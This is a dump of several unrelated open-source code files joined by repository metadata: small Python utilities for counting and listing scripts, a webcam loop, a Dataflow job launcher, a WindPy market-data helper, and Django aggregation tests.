    github_count = sum((len(f) for _, _, f in os.walk(github_dir))) # Total file count across all subdirectories
    if github_count > 5: # More than 5 queued: nag loudly
        print '\nYou have too many in here, start uploading !!!!!'
        print 'You have: ' + str(github_count) + ' waiting to be uploaded to github!!'
    elif github_count == 0: # Nothing queued
        print '\nGithub directory is all Clear'
    else: # 1..5 queued: just report the number outstanding
        print '\nYou have: ' + str(github_count) + ' waiting to be uploaded to github!!'
def development(): # Count the files waiting in the development directory
    """Report how many files are sitting in <scripts>/development
    waiting to be finished.  Uses the module-level `path` variable.
    NOTE: Python 2 only (print statements).
    """
    dev_dir = os.path.join(path, 'development') # Joins the paths to get the development directory - 1.1
    dev_count = sum((len(f) for _, _, f in os.walk(dev_dir))) # Total file count across all subdirectories
    if dev_count > 10: # More than 10 pending: nag loudly
        print '\nYou have too many in here, finish them or delete them !!!!!'
        print 'You have: ' + str(dev_count) + ' waiting to be finished!!'
    elif dev_count ==0: # Nothing pending
        print '\nDevelopment directory is all clear'
    else:
        print '\nYou have: ' + str(dev_count) + ' waiting to be finished!!' # 1..10 pending: report the number
clear_screen() # Call the function to clear the screen
print '\nYou have the following :\n'
print 'AutoIT:\t' + str(count_files(path, '.au3')) # Run the count_files function to count the files with the extension we pass
print 'Batch:\t' + str(count_files(path, ('.bat', ',cmd'))) # 1.3
print 'Perl:\t' + str(count_files(path, '.pl'))
print 'PHP:\t' + str(count_files(path, '.php')) # 1.2
print 'Python:\t' + str(count_files(path, '.py'))
print 'Shell:\t' + str(count_files(path, ('.ksh', '.sh', '.bash')))
print 'SQL:\t' + str(count_files(path, '.sql'))
github() # Call the github function
development() # Call the development function# Script Name : script_listing.py
# Author : Craig Richards
# Created : 15th February 2012
# Last Modified : 29th May 2012
# Version : 1.2
# Modifications : 1.1 - 28-02-2012 - CR - Added the variable to get the logs directory, I then joined the output so the file goes to the logs directory
# : 1.2 - 29-05/2012 - CR - Changed the line so it doesn't ask for a directory, it now uses the environment varaible scripts
# Description : This will list all the files in the given directory, it will also go through all the subdirectories as well
import os # Load the library module
logdir = os.getenv("logs") # Directory for log output (from env var logs)
logfile = 'script_list.log' # Log file name
path = os.getenv("scripts") # Root directory to walk (from env var scripts) - 1.2
#path = (raw_input("Enter dir: ")) # (disabled) interactive prompt for the directory
logfilename = os.path.join(logdir, logfile) # Full path of the log file
log = open(logfilename, 'w') # NOTE(review): never closed; buffered output may be lost without close()/flush()
for dirpath, dirname, filenames in os.walk(path): # Go through the directories and the subdirectories
    for filename in filenames: # Get all the filenames
        log.write(os.path.join(dirpath, filename)+'\n') # Write the full path out to the logfile
print ("\nYour logfile " , logfilename, "has been created") # NOTE: under Python 2 this prints a tuple, not a joined sentence
import cv2
cap = cv2.VideoCapture(0) # Open the default webcam (device 0)
while(True):
    # Capture frame-by-frame
    ret, frame = cap.read() # NOTE(review): `ret` (success flag) is never checked before using `frame`
    # Convert the captured frame to grayscale
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # Display the resulting frame
    cv2.imshow('frame',gray)
    if cv2.waitKey(1) & 0xFF == ord('q'): # Quit the loop when the user presses 'q'
        break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"ekkya@tcd.ie"
] | ekkya@tcd.ie |
288b5306f323b0024d8bdacbb104e4fef3aef131 | f31fda8014ecadf6af7d4e3392fb917c49e0352a | /HeavyIonsAnalysis/VertexAnalysis/python/__init__.py | 33e53c5f468fb19b01b06f042239cab6d2875ca9 | [] | no_license | jniedzie/lightbylight | acea5051f053c49824a49a0b78bac3a2247ee75f | f5a4661fcf3fd3c0e9ccd8893a46a238e30c2aa8 | refs/heads/master | 2020-03-18T12:24:31.970468 | 2018-02-09T15:50:00 | 2018-02-09T15:50:00 | 134,724,759 | 0 | 1 | null | 2018-05-24T14:11:12 | 2018-05-24T14:11:12 | null | UTF-8 | Python | false | false | 216 | py | #Automatically created by SCRAM
import os
__path__.append(os.path.dirname(os.path.abspath(__file__).rsplit('/HeavyIonsAnalysis/VertexAnalysis/',1)[0])+'/cfipython/slc6_amd64_gcc491/HeavyIonsAnalysis/VertexAnalysis')
| [
"rchudasa@cern.ch"
] | rchudasa@cern.ch |
e429bc43021bd26b4ced08927e9dbec8c65dc8ea | 5e93ffc8068809e2f8ee532ed9bdf0e367ef9742 | /ejer8.py | 59ff40c035ad98ad4bc74b74e89c459b0f73be33 | [] | no_license | Vides99/FP_Laboratorio_6_00368019 | cb9b0f7257537b9ef4aaadb09a4e7b884e064e69 | 0ab61780e52923ad7b18e22cebf6ca0b3d4bed76 | refs/heads/master | 2020-08-10T05:58:52.666540 | 2019-10-16T18:05:49 | 2019-10-16T18:05:49 | 214,276,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 219 | py | numeroAmultiplicar = int(input("Ingrese el numero del cual quiere conocer la tabla (dicha tabla sera del 1 hasta el 10)"))
for i in range (1,11):
print(numeroAmultiplicar, " * ", i, " = ", (numeroAmultiplicar * i))
| [
"noreply@github.com"
] | noreply@github.com |
a3a78eb8bcaa7274ca583df0322a09926713b306 | 21f4b333d2a3693a665826b083be473eb9c8ea99 | /webapp/DataflowApi.py | 4c67b71536b0198cbc3a0f5f6c5539c7ed8d5f53 | [
"Apache-2.0"
] | permissive | khanhhale/IoTProjectWithPylonCamera | 3e4bdbd58379e6b9e5fea445336a6b6eae4125f7 | cd51315053afc542e22e644d471a97a18509dfc6 | refs/heads/master | 2021-05-11T17:32:38.492614 | 2018-10-26T00:28:15 | 2018-10-26T00:28:15 | 117,800,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,317 | py | # Copyright 2017, Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import json
import logging
from Utility import *
class DataflowApi(Utility):
    """Thin wrapper around a Google Cloud Dataflow client for launching
    template-based jobs.

    NOTE: Python 2 only (print statement in the except handler below).
    """
    def __init__(self):
        """
        Description:
            Constructor; initialises the Utility base class.
        Args:
            None
        Returns:
            None
        """
        super(DataflowApi,self).__init__()
    def create_dataflow_job_PubSub_to_GCS(self, client, PROJECT, JOBNAME, BUCKET, topic, table):
        """
        Description:
            Launch the stock "Cloud_PubSub_to_GCS_Text" Dataflow template,
            streaming messages from *topic* into text files under
            gs://<BUCKET>/camera/.
        Args:
            client: Dataflow API client service object
            PROJECT: project id
            JOBNAME: name of the dataflow job
            BUCKET: GCS bucket used for the output and temp locations
            topic: full path to topic name. Ex: projects/<project>/topics/<topic>
            table: full path to a table name. Ex: projectid:datasetid.tableid
                (NOTE(review): accepted but never used by this method)
        Returns:
            On success: a json object describing the launched job
            On failure: the exception is re-raised
        Raises:
            Re-raises any exception from the launch/execute API calls.
        """
        GCSPATH = "gs://dataflow-templates/latest/Cloud_PubSub_to_GCS_Text"
        BODY = {
            "jobName": "{jobname}".format(jobname=JOBNAME),
            "parameters": {
                "inputTopic": topic,
                "outputDirectory": "gs://{bucket}/camera/".format(bucket=BUCKET),
                "outputFilenamePrefix": "output-",
                "outputFilenameSuffix": ".txt",
            },
            "environment": {
                "tempLocation": "gs://{bucket}/tmp".format(bucket=BUCKET),
                "zone": "us-central1-f"
            }
        }
        try:
            request = client.projects().templates().launch(projectId=PROJECT, gcsPath=GCSPATH, body=BODY)
            response = request.execute()
            return response
        except Exception as e:
            print "Exception: %s, cannot publish message" % e
            raise
| [
"khanhl@khanhl-glaptop.roam.corp.google.com"
] | khanhl@khanhl-glaptop.roam.corp.google.com |
2eff8e1f3b21be34329ac979322bd7291501bcac | d5058adfd456aa7950ea5a0c2918f8b6749b7bdf | /Utils/windHelper.py | d4bffa44d786bbfe314afb8c977037e8b7b837e5 | [] | no_license | dxcv/pyLuke | 1f6ae3ffd0ef8afe3d5505324b59ed7e5ed5442c | 99e4e762f00fb20f15aa4835e0ecea433695dff6 | refs/heads/master | 2020-05-29T12:34:18.349194 | 2017-10-12T02:12:09 | 2017-10-12T02:12:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,470 | py | # encoding: utf-8
# thd
from WindPy import w
import pandas as pd
from datetime import timedelta, datetime
class WindHelper(object):
    """
    WindPy update 2017-09-04:
    After that update, the Times in the results of the following
    functions contain only the date (no time of day):
        wsd, tdays, tdayscount, tdaysoffset, wset, weqs, wpd, htocode, edb
    Commonly used fields:
        close
        settle
        volume
    """
    @staticmethod
    def getMultiTimeSeriesDataFrame(codeList, beginDate, endDate, para, period="",
                                    tradingCalendar="", priceAdj="", credibility=0):
        """
        Fetch one time series per code from WindPy; ``para`` must be a
        single field name, and each code becomes one column named
        "<code>_<para>".
        Monthly contract field: trade_hiscode.
        :param credibility: (int)
        :param codeList: (list)
        :param beginDate: (date or datetime)
        :param endDate: (date or datetime)
        :param para: (string) exactly one field name
        :param period: (string) sampling frequency ("W" = weekly)
        :param tradingCalendar: (string) trading calendar; "NIB" selects the
            interbank calendar, empty means the exchange calendar
        :param priceAdj: (string) price adjustment: "F" forward, "B" backward
        :return: (DataFrame)
        """
        try:
            w.start()
            codeListStr = ",".join(codeList)
            period = ("Period=" + period) if period == "W" else ""
            tradingCalendar = ("TradingCalendar=" + tradingCalendar) if tradingCalendar != "" else ""
            priceAdj = ("priceAdj=" + priceAdj) if priceAdj != "" else ""
            credibility = ("credibility=" + str(credibility)) if credibility != 0 else ""
            windData = w.wsd(codeListStr,
                             para,
                             beginDate.strftime("%Y-%m-%d"),
                             endDate.strftime("%Y-%m-%d"),
                             period,
                             tradingCalendar,
                             priceAdj, credibility)
            if len(windData.Data) == 0:
                raise BaseException
            if len(windData.Data[0]) == 0:
                raise BaseException
            dataDict = {}
            for i in range(len(windData.Data)):
                dataDict[windData.Codes[i].lower() + "_" + para] = windData.Data[i]
            df = pd.DataFrame(dataDict, index=windData.Times)
            df.index = pd.to_datetime(df.index)
            df.index.name = "trade_date"
            return df
        except BaseException as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def getTimeSeriesDataFrame(code, beginDate, endDate, paraList, period="",
                               tradingCalendar="", priceAdj="", credibility=0):
        """
        Fetch a time series of several fields for a single code from
        WindPy; each requested field becomes one column.
        Monthly contract field: trade_hiscode.
        :param credibility: (int)
        :param code: (string)
        :param beginDate: (date or datetime)
        :param endDate: (date or datetime)
        :param paraList: (list) field names
        :param period: (string) sampling frequency ("W" = weekly)
        :param tradingCalendar: (string) trading calendar; "NIB" selects the
            interbank calendar, empty means the exchange calendar
        :param priceAdj: (string) price adjustment: "F" forward, "B" backward
        :return: (DataFrame)
        """
        try:
            w.start()
            para = ",".join(paraList)
            period = ("Period=" + period) if period == "W" else ""
            tradingCalendar = ("TradingCalendar=" + tradingCalendar) if tradingCalendar != "" else ""
            priceAdj = ("priceAdj=" + priceAdj) if priceAdj != "" else ""
            credibility = ("credibility=" + str(credibility)) if credibility != 0 else ""
            # NOTE(review): `period` is built above but is not passed to w.wsd
            # below (unlike getMultiTimeSeriesDataFrame) — confirm intended.
            windData = w.wsd(code,
                             para,
                             beginDate.strftime("%Y-%m-%d"),
                             endDate.strftime("%Y-%m-%d"),
                             tradingCalendar,
                             priceAdj, credibility)
            if len(windData.Data) == 0:
                raise BaseException
            if len(windData.Data[0]) == 0:
                raise BaseException
            dataDict = {}
            for i in range(len(windData.Data)):
                dataDict[windData.Fields[i].lower()] = windData.Data[i]
            df = pd.DataFrame(dataDict, index=windData.Times)
            df.index = pd.to_datetime(df.index)
            df.index.name = "trade_date"
            return df
        except BaseException as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def getMinTimeSeriesDataFrame(code, beginDate, endDate, paraList, bar_size=1):
        """
        Fetch minute-level bars from WindPy.
        Monthly contract field: trade_hiscode.
        :param bar_size: (int) bar frequency in minutes
        :param code: string
        :param beginDate: date or datetime
        :param endDate: date or datetime
        :param paraList: list
        :return: DataFrame
        """
        try:
            w.start()
            para = ",".join(paraList)
            # NOTE(review): "" + bar_size raises TypeError for the default
            # int argument, and the result is never passed to w.wsi below —
            # confirm the intended type/usage.
            bar_size = "" + bar_size if bar_size is not None else ""
            windData = w.wsi(code,
                             para,
                             beginDate.strftime("%Y-%m-%d %H:%M:%S"),
                             endDate.strftime("%Y-%m-%d %H:%M:%S"), "")
            if len(windData.Data) == 0:
                raise BaseException
            if len(windData.Data[0]) == 0:
                raise BaseException
            dataDict = {}
            for i in range(len(windData.Data)):
                dataDict[windData.Fields[i].lower()] = windData.Data[i]
            df = pd.DataFrame(dataDict, index=windData.Times)
            if df.index[0].to_pydatetime().microsecond != 0:
                # Align timestamps by stripping the sub-second component.
                df.index -= timedelta(microseconds=df.index[0].to_pydatetime().microsecond)
            df.index.name = "trade_date"
            return df
        except BaseException as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def getInfoDataFrame(code, paraList):
        """
        Fetch static (snapshot) information for one product by code.
        :param code: (string)
        :param paraList: (list) field names; columns are returned in this order
        :return: DataFrame, or None when WindPy returns no data
        """
        try:
            w.start()
            para = ",".join(paraList)
            windData = w.wss(code,
                             para)
            if len(windData.Data) == 0:
                return None
            if len(windData.Data[0]) == 0:
                return None
            dataDict = {}
            for i in range(len(windData.Data)):
                dataDict[windData.Fields[i].lower()] = windData.Data[i]
            df = pd.DataFrame(dataDict)
            df = df[paraList]
            return df
        except BaseException as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def getEDBTimeSeriesDataFrame(codeList, beginDate, endDate, fillChoice="Previous"):
        """
        Fetch macroeconomic (EDB) time series from WindPy; each code
        becomes one column.
        :param fillChoice: (string) "Previous" or None — whether empty
            values are filled with the previous day's value
        """
        codeListStr = ",".join(codeList)
        try:
            w.start()
            if fillChoice == "Previous":
                windData = w.edb(codeListStr,
                                 beginDate.strftime("%Y-%m-%d"),
                                 endDate.strftime("%Y-%m-%d"),
                                 "Fill=" + fillChoice)
            else:
                windData = w.edb(codeListStr,
                                 beginDate.strftime("%Y-%m-%d"),
                                 endDate.strftime("%Y-%m-%d"))
            if len(windData.Data) == 0:
                return None
            if len(windData.Data[0]) == 0:
                return None
            dataDict = {}
            for i in range(len(windData.Data)):
                dataDict[windData.Codes[i]] = windData.Data[i]
            df = pd.DataFrame(dataDict, index=windData.Times)
            df.index = pd.to_datetime(df.index)
            df.index.name = "trade_date"
            return df
        except BaseException as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def getOffsetDays(offset=0, curDate=datetime.now()):
        """Return the trading day *offset* days away from *curDate*.

        NOTE(review): the default curDate=datetime.now() is evaluated
        once at import time, not per call — confirm intended.
        """
        try:
            w.start()
            result = w.tdaysoffset(offset, curDate.strftime("%Y-%m-%d"), "").Data[0][0]
            return result
        except IndexError as e:
            # NOTE(review): e.message only exists on Python 2 exceptions
            print(e.message)
            raise
    @staticmethod
    def daysCount(firstDate, secondDate):
        """Return the number of trading days between the two dates."""
        w.start()
        result = w.tdayscount(firstDate.strftime("%Y-%m-%d"), secondDate.strftime("%Y-%m-%d"), "").Data[0][0]
        return result
    @staticmethod
    def getAllTrsFtCodes(beginDate, endDate):
        """Placeholder: intended to list treasury-futures codes for the
        date range; not implemented yet."""
        w.start()
        pass
def test():
    """Ad-hoc smoke test: fetch settle prices for two treasury-futures
    contracts and print the resulting frame."""
    beginDate = datetime(2008, 12, 1)  # NOTE(review): unused by the active call below
    endDate = datetime(2017, 8, 30)  # NOTE(review): unused by the active call below
    # df = WindHelper.getEDBTimeSeriesDataFrame(["S0059749"], beginDate=beginDate, endDate=endDate)
    codeList = ["T1612.CFE", "T1703.CFE"]
    para = "settle"
    df = WindHelper.getMultiTimeSeriesDataFrame(codeList=codeList, beginDate=datetime(2016, 5, 1),
                                                endDate=datetime(2016, 12, 11), para=para)
    print(df)
if __name__ == "__main__":
    test()
| [
"wangluzhou@aliyun.com"
] | wangluzhou@aliyun.com |
5ba6618f5ca4b1f7c28f8cf76de9006dff006b9f | b2f9ff599a4869db733dc5f4fa93c2a47cff9064 | /brainduck/brainduck.py | 6e57bb478fe25d806fe2c45505aa9e98900f76a7 | [
"MIT"
] | permissive | eaybek/brainduck | e9ae7159ee9ad6d21ecc5a3fb5b012cb44a680a5 | f45dea58a39dc543d9bbf9cdc4732cbdd8f7c0ea | refs/heads/master | 2020-07-31T16:43:40.541858 | 2019-09-24T19:15:11 | 2019-09-24T19:15:11 | 210,679,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 85 | py | class Brainduck(object):
pass
if __name__ == "__main__":
print('It works!')
| [
"eaybek@gmail.com"
] | eaybek@gmail.com |
312796ff98fadf97216ff3c7db06d5b89af9ed2e | cfb01066c08fc4f4b0ab481dc0ff7c6ce2fb9981 | /tests/aggregation/tests.py | e81744df29bd81e34a3ccbb0ab02cadb210194f6 | [
"MIT"
] | permissive | pombredanne/django-aggregate-if | 21a8dc460f73d629b79be0c54356c70d92048780 | 02f43633c620de53aa7b9479523bbba8013a3900 | refs/heads/master | 2021-01-23T01:30:13.182765 | 2013-01-02T23:47:45 | 2013-01-02T23:47:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,983 | py | from __future__ import absolute_import
import datetime
from decimal import Decimal
from django.db.models import Q, F
from django.test import TestCase, Approximate
from aggregate_if import Sum, Count, Avg, Max, Min
from .models import Author, Publisher, Book, Store
class BaseAggregateTestCase(TestCase):
fixtures = ["aggregation.json"]
def test_empty_aggregate(self):
self.assertEqual(Author.objects.all().aggregate(), {})
def test_single_aggregate(self):
vals = Author.objects.aggregate(Avg("age"))
self.assertEqual(vals, {"age__avg": Approximate(37.4, places=1)})
vals = Author.objects.aggregate(Sum("age", only=Q(age__gt=29)))
self.assertEqual(vals, {"age__sum": 254})
vals = Author.objects.extra(select={'testparams':'age < %s'}, select_params=[0])\
.aggregate(Sum("age", only=Q(age__gt=29)))
self.assertEqual(vals, {"age__sum": 254})
vals = Author.objects.aggregate(Sum("age", only=Q(name__icontains='jaco')|Q(name__icontains='adrian')))
self.assertEqual(vals, {"age__sum": 69})
def test_multiple_aggregates(self):
vals = Author.objects.aggregate(Sum("age"), Avg("age"))
self.assertEqual(vals, {"age__sum": 337, "age__avg": Approximate(37.4, places=1)})
vals = Author.objects.aggregate(Sum("age", only=Q(age__gt=29)), Avg("age"))
self.assertEqual(vals, {"age__sum": 254, "age__avg": Approximate(37.4, places=1)})
def test_filter_aggregate(self):
vals = Author.objects.filter(age__gt=29).aggregate(Sum("age"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["age__sum"], 254)
vals = Author.objects.filter(age__gt=29).aggregate(Sum("age", only=Q(age__lt=29)))
# If there are no matching aggregates, then None, not 0 is the answer.
self.assertEqual(vals["age__sum"], None)
def test_related_aggregate(self):
vals = Author.objects.aggregate(Avg("friends__age"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 34.07, places=2)
vals = Author.objects.aggregate(Avg("friends__age", only=Q(age__lt=29)))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 33.67, places=2)
vals2 = Author.objects.filter(age__lt=29).aggregate(Avg("friends__age"))
self.assertEqual(vals, vals2)
vals = Author.objects.aggregate(Avg("friends__age", only=Q(friends__age__lt=35)))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 28.75, places=2)
# The average age of author's friends, whose age is lower than the authors age.
vals = Author.objects.aggregate(Avg("friends__age", only=Q(friends__age__lt=F('age'))))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["friends__age__avg"], 30.43, places=2)
vals = Book.objects.filter(rating__lt=4.5).aggregate(Avg("authors__age"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["authors__age__avg"], 38.2857, places=2)
vals = Author.objects.all().filter(name__contains="a").aggregate(Avg("book__rating"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__rating__avg"], 4.0)
vals = Book.objects.aggregate(Sum("publisher__num_awards"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["publisher__num_awards__sum"], 30)
vals = Publisher.objects.aggregate(Sum("book__price"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__price__sum"], Decimal("270.27"))
def test_aggregate_multi_join(self):
vals = Store.objects.aggregate(Max("books__authors__age"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["books__authors__age__max"], 57)
vals = Store.objects.aggregate(Max("books__authors__age", only=Q(books__authors__age__lt=56)))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["books__authors__age__max"], 46)
vals = Author.objects.aggregate(Min("book__publisher__num_awards"))
self.assertEqual(len(vals), 1)
self.assertEqual(vals["book__publisher__num_awards__min"], 1)
def test_aggregate_alias(self):
vals = Store.objects.filter(name="Amazon.com").aggregate(amazon_mean=Avg("books__rating"))
self.assertEqual(len(vals), 1)
self.assertAlmostEqual(vals["amazon_mean"], 4.08, places=2)
def test_annotate_basic(self):
self.assertQuerysetEqual(
Book.objects.annotate().order_by('pk'), [
"The Definitive Guide to Django: Web Development Done Right",
"Sams Teach Yourself Django in 24 Hours",
"Practical Django Projects",
"Python Web Development with Django",
"Artificial Intelligence: A Modern Approach",
"Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp"
],
lambda b: b.name
)
books = Book.objects.annotate(mean_age=Avg("authors__age"))
b = books.get(pk=1)
self.assertEqual(
b.name,
'The Definitive Guide to Django: Web Development Done Right'
)
self.assertEqual(b.mean_age, 34.5)
'''
def test_f_expression(self):
publishers = Publisher.objects.annotate(avg_rating=Avg(F('book__rating') - 0))
publishers = publishers.values_list('id', 'avg_rating').order_by('id')
self.assertEqual(list(publishers), [(1, 4.25), (2, 3.0), (3, 4.0), (4, 5.0), (5, None)])
def test_only_condition_with_join(self):
# Test extra-select
books = Book.objects.annotate(mean_age=Avg("authors__age"))
books = books.annotate(mean_age2=Avg('authors__age', only=Q(authors__age__gte=0)))
books = books.extra(select={'testparams': 'publisher_id = %s'}, select_params=[1])
b = books.get(pk=1)
self.assertEqual(b.mean_age, 34.5)
self.assertEqual(b.mean_age2, 34.5)
self.assertEqual(b.testparams, True)
def test_relabel_aliases(self):
# Test relabel_aliases
excluded_authors = Author.objects.annotate(book_rating=Min(F('book__rating') + 5, only=Q(pk__gte=1)))
excluded_authors = excluded_authors.filter(book_rating__lt=0)
books = books.exclude(authors__in=excluded_authors)
b = books.get(pk=1)
self.assertEqual(b.mean_age, 34.5)
def test_joins_in_f(self):
# Test joins in F-based annotation
books = Book.objects.annotate(oldest=Max(F('authors__age')))
books = books.values_list('rating', 'oldest').order_by('rating', 'oldest')
self.assertEqual(
list(books),
[(3.0, 45), (4.0, 29), (4.0, 37), (4.0, 57), (4.5, 35), (5.0, 57)]
)
'''
def test_annotate_m2m(self):
books = Book.objects.filter(rating__lt=4.5).annotate(Avg("authors__age")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 51.5),
('Practical Django Projects', 29.0),
('Python Web Development with Django', Approximate(30.3, places=1)),
('Sams Teach Yourself Django in 24 Hours', 45.0)
],
lambda b: (b.name, b.authors__age__avg),
)
books = Book.objects.annotate(num_authors=Count("authors")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 2),
('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 1),
('Practical Django Projects', 1),
('Python Web Development with Django', 3),
('Sams Teach Yourself Django in 24 Hours', 1),
('The Definitive Guide to Django: Web Development Done Right', 2)
],
lambda b: (b.name, b.num_authors)
)
def test_backwards_m2m_annotate(self):
authors = Author.objects.filter(name__contains="a").annotate(Avg("book__rating")).order_by("name")
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 4.5),
('Brad Dayley', 3.0),
('Jacob Kaplan-Moss', 4.5),
('James Bennett', 4.0),
('Paul Bissex', 4.0),
('Stuart Russell', 4.0)
],
lambda a: (a.name, a.book__rating__avg)
)
authors = Author.objects.annotate(num_books=Count("book")).order_by("name")
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 1),
('Brad Dayley', 1),
('Jacob Kaplan-Moss', 1),
('James Bennett', 1),
('Jeffrey Forcier', 1),
('Paul Bissex', 1),
('Peter Norvig', 2),
('Stuart Russell', 1),
('Wesley J. Chun', 1)
],
lambda a: (a.name, a.num_books)
)
def test_reverse_fkey_annotate(self):
books = Book.objects.annotate(Sum("publisher__num_awards")).order_by("name")
self.assertQuerysetEqual(
books, [
('Artificial Intelligence: A Modern Approach', 7),
('Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', 9),
('Practical Django Projects', 3),
('Python Web Development with Django', 7),
('Sams Teach Yourself Django in 24 Hours', 1),
('The Definitive Guide to Django: Web Development Done Right', 3)
],
lambda b: (b.name, b.publisher__num_awards__sum)
)
publishers = Publisher.objects.annotate(Sum("book__price")).order_by("name")
self.assertQuerysetEqual(
publishers, [
('Apress', Decimal("59.69")),
("Jonno's House of Books", None),
('Morgan Kaufmann', Decimal("75.00")),
('Prentice Hall', Decimal("112.49")),
('Sams', Decimal("23.09"))
],
lambda p: (p.name, p.book__price__sum)
)
def test_annotate_values(self):
books = list(Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values())
self.assertEqual(
books, [
{
"contact_id": 1,
"id": 1,
"isbn": "159059725",
"mean_age": 34.5,
"name": "The Definitive Guide to Django: Web Development Done Right",
"pages": 447,
"price": Approximate(Decimal("30")),
"pubdate": datetime.date(2007, 12, 6),
"publisher_id": 1,
"rating": 4.5,
}
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg('authors__age')).values('pk', 'isbn', 'mean_age')
self.assertEqual(
list(books), [
{
"pk": 1,
"isbn": "159059725",
"mean_age": 34.5,
}
]
)
books = Book.objects.filter(pk=1).annotate(mean_age=Avg("authors__age")).values("name")
self.assertEqual(
list(books), [
{
"name": "The Definitive Guide to Django: Web Development Done Right"
}
]
)
books = Book.objects.filter(pk=1).values().annotate(mean_age=Avg('authors__age'))
self.assertEqual(
list(books), [
{
"contact_id": 1,
"id": 1,
"isbn": "159059725",
"mean_age": 34.5,
"name": "The Definitive Guide to Django: Web Development Done Right",
"pages": 447,
"price": Approximate(Decimal("30")),
"pubdate": datetime.date(2007, 12, 6),
"publisher_id": 1,
"rating": 4.5,
}
]
)
books = Book.objects.values("rating").annotate(n_authors=Count("authors__id"), mean_age=Avg("authors__age")).order_by("rating")
self.assertEqual(
list(books), [
{
"rating": 3.0,
"n_authors": 1,
"mean_age": 45.0,
},
{
"rating": 4.0,
"n_authors": 6,
"mean_age": Approximate(37.16, places=1)
},
{
"rating": 4.5,
"n_authors": 2,
"mean_age": 34.5,
},
{
"rating": 5.0,
"n_authors": 1,
"mean_age": 57.0,
}
]
)
authors = Author.objects.annotate(Avg("friends__age")).order_by("name")
self.assertEqual(len(authors), 9)
self.assertQuerysetEqual(
authors, [
('Adrian Holovaty', 32.0),
('Brad Dayley', None),
('Jacob Kaplan-Moss', 29.5),
('James Bennett', 34.0),
('Jeffrey Forcier', 27.0),
('Paul Bissex', 31.0),
('Peter Norvig', 46.0),
('Stuart Russell', 57.0),
('Wesley J. Chun', Approximate(33.66, places=1))
],
lambda a: (a.name, a.friends__age__avg)
)
def test_count(self):
vals = Book.objects.aggregate(Count("rating"))
self.assertEqual(vals, {"rating__count": 6})
vals = Book.objects.aggregate(Count("rating", distinct=True))
self.assertEqual(vals, {"rating__count": 4})
def test_fkey_aggregate(self):
explicit = list(Author.objects.annotate(Count('book__id')))
implicit = list(Author.objects.annotate(Count('book')))
self.assertEqual(explicit, implicit)
def test_annotate_ordering(self):
books = Book.objects.values('rating').annotate(oldest=Max('authors__age')).order_by('oldest', 'rating')
self.assertEqual(
list(books), [
{
"rating": 4.5,
"oldest": 35,
},
{
"rating": 3.0,
"oldest": 45
},
{
"rating": 4.0,
"oldest": 57,
},
{
"rating": 5.0,
"oldest": 57,
}
]
)
books = Book.objects.values("rating").annotate(oldest=Max("authors__age")).order_by("-oldest", "-rating")
self.assertEqual(
list(books), [
{
"rating": 5.0,
"oldest": 57,
},
{
"rating": 4.0,
"oldest": 57,
},
{
"rating": 3.0,
"oldest": 45,
},
{
"rating": 4.5,
"oldest": 35,
}
]
)
def test_aggregate_annotation(self):
vals = Book.objects.annotate(num_authors=Count("authors__id")).aggregate(Avg("num_authors"))
self.assertEqual(vals, {"num_authors__avg": Approximate(1.66, places=1)})
def test_filtering(self):
p = Publisher.objects.create(name='Expensive Publisher', num_awards=0)
Book.objects.create(
name='ExpensiveBook1',
pages=1,
isbn='111',
rating=3.5,
price=Decimal("1000"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,1)
)
Book.objects.create(
name='ExpensiveBook2',
pages=1,
isbn='222',
rating=4.0,
price=Decimal("1000"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,2)
)
Book.objects.create(
name='ExpensiveBook3',
pages=1,
isbn='333',
rating=4.5,
price=Decimal("35"),
publisher=p,
contact_id=1,
pubdate=datetime.date(2008,12,3)
)
publishers = Publisher.objects.annotate(num_books=Count("book__id")).filter(num_books__gt=1).order_by("pk")
self.assertQuerysetEqual(
publishers, [
"Apress",
"Prentice Hall",
"Expensive Publisher",
],
lambda p: p.name,
)
